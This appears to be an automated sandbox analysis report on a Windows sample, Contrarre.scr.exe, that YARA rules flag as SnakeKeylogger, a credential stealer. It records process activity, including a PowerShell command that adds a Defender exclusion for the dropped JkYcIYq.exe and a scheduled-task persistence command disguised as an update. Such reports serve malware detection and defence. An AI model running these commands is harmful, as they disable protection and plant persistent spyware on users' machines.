Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_09255C00	9_2_09255C00
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_09250040	9_2_09250040
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_09252098	9_2_09252098
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_09257268	9_2_09257268
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_092557C0	9_2_092557C0
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_092516E0	9_2_092516E0
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_09254920	9_2_09254920
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_09251B28	9_2_09251B28
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_0925EB70	9_2_0925EB70
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_0925EB73	9_2_0925EB73
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_0925EB90	9_2_0925EB90
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_09256AA8	9_2_09256AA8
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_09253D70	9_2_09253D70
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_09254FB0	9_2_09254FB0
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_09255E48	9_2_09255E48
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_09258108	9_2_09258108
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_092561A0	9_2_092561A0
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_092551D0	9_2_092551D0
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_092565E8	9_2_092565E8
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_0925F400	9_2_0925F400
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_09255448	9_2_09255448
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 13_2_027AC530	13_2_027AC530
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 13_2_027A2DD1	13_2_027A2DD1
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 13_2_027A9480	13_2_027A9480
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 13_2_027AC521	13_2_027AC521
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 13_2_027A946F	13_2_027A946F

Source: Contrarre.scr.exe

Static PE information: invalid certificate

Source: Contrarre.scr.exe, 00000000.00000002.1386381753.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs Contrarre.scr.exe
Source: Contrarre.scr.exe, 00000000.00000002.1390790141.000000000A00A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Contrarre.scr.exe
Source: Contrarre.scr.exe, 00000000.00000000.1342144158.0000000000E84000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameGgfA.exe" vs Contrarre.scr.exe
Source: Contrarre.scr.exe, 00000000.00000002.1390973219.000000000A0B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Contrarre.scr.exe
Source: Contrarre.scr.exe, 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs Contrarre.scr.exe
Source: Contrarre.scr.exe, 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Contrarre.scr.exe
Source: Contrarre.scr.exe, 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs Contrarre.scr.exe
Source: Contrarre.scr.exe, 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs Contrarre.scr.exe
Source: Contrarre.scr.exe, 00000000.00000002.1389803473.0000000008100000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs Contrarre.scr.exe
Source: Contrarre.scr.exe, 00000000.00000002.1385142206.000000000148E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Contrarre.scr.exe
Source: Contrarre.scr.exe, 00000008.00000002.2610861634.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Contrarre.scr.exe
Source: Contrarre.scr.exe	Binary or memory string: OriginalFilenameGgfA.exe" vs Contrarre.scr.exe

Source: Contrarre.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.JkYcIYq.exe.37f6d18.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.JkYcIYq.exe.37f6d18.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Contrarre.scr.exe.4b84148.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Contrarre.scr.exe.4b84148.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.JkYcIYq.exe.386bac0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.JkYcIYq.exe.386bac0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Contrarre.scr.exe.4d5fcf8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Contrarre.scr.exe.4d5fcf8.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Contrarre.scr.exe.4d5fcf8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Contrarre.scr.exe.4d5fcf8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.JkYcIYq.exe.37f6d18.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.JkYcIYq.exe.386bac0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.JkYcIYq.exe.386bac0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Contrarre.scr.exe.4b84148.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Contrarre.scr.exe PID: 7392, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Contrarre.scr.exe PID: 7756, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: JkYcIYq.exe PID: 7840, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Contrarre.scr.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: JkYcIYq.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/11@3/2

Source: C:\Users\user\Desktop\Contrarre.scr.exe

File created: C:\Users\user\AppData\Roaming\JkYcIYq.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Mutant created: \Sessions\1\BaseNamedObjects\hScPFklfDzDjsfpHbjpVawnAuV

Source: C:\Users\user\Desktop\Contrarre.scr.exe

File created: C:\Users\user\AppData\Local\Temp\tmp3B82.tmp

Jump to behavior

Source: Contrarre.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Contrarre.scr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\Contrarre.scr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Contrarre.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002F3D000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2615988936.00000000039AD000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.0000000002A5E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Contrarre.scr.exe	Virustotal: Detection: 34%
Source: Contrarre.scr.exe	ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\Contrarre.scr.exe

File read: C:\Users\user\Desktop\Contrarre.scr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Contrarre.scr.exe "C:\Users\user\Desktop\Contrarre.scr.exe"
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JkYcIYq.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp3B82.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process created: C:\Users\user\Desktop\Contrarre.scr.exe "C:\Users\user\Desktop\Contrarre.scr.exe"
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process created: C:\Users\user\Desktop\Contrarre.scr.exe "C:\Users\user\Desktop\Contrarre.scr.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\JkYcIYq.exe C:\Users\user\AppData\Roaming\JkYcIYq.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp48FF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process created: C:\Users\user\AppData\Roaming\JkYcIYq.exe "C:\Users\user\AppData\Roaming\JkYcIYq.exe"
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JkYcIYq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp3B82.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process created: C:\Users\user\Desktop\Contrarre.scr.exe "C:\Users\user\Desktop\Contrarre.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process created: C:\Users\user\Desktop\Contrarre.scr.exe "C:\Users\user\Desktop\Contrarre.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp48FF.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process created: C:\Users\user\AppData\Roaming\JkYcIYq.exe "C:\Users\user\AppData\Roaming\JkYcIYq.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
